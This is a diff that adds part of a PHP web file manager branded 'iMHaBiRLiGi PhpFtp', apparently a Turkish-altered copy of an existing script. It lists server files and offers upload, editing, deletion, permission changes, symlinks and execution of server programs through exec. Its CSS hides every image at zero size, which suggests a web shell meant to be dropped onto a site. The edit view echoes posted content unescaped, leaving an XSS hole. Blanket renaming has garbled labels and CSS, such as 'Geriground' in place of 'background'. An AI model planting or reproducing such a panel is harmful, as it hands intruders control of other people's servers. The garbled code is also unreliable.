+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="Görevler">' . word('Görevler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="Görevler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'Düzenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function Düzenle ($file) {
+	global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="Düzenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'Görevler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'löschen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'Düzenle' => 'Düzenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zurück',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'Görevler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
+'create_symlink' => 'Créer lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'Déplacer',
+'Kopyala' => 'Copier',
+'Düzenle' => 'Ouvrir',
+'indir' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_Sil' => 'Effacer le fichier?',
+'Sild' => "Ces fichiers ont été détuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a été renommé en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
+'Tasi_files' => 'Déplacer ces fichiers:',
+'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'Görevler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'Düzenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'Görevler' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'Düzenle' => 'Ändra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De här filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn på fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Düzergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Diðerleri',
+'Görevler' => 'Görevler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'Düzenle' => 'Düzenle',
+'indir' => 'indir',
+'upload' => 'Yükle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hiçbir çýktý',
+
+'user' => 'Kullanýcý',
+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Yüklendi.',
+'not_uploaded' => '"[%1]" Yüklenemedi.',
+'already_exists' => '"[%1]" Þimdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazdý Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" Düzenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtarýlamadý.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .Görevler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
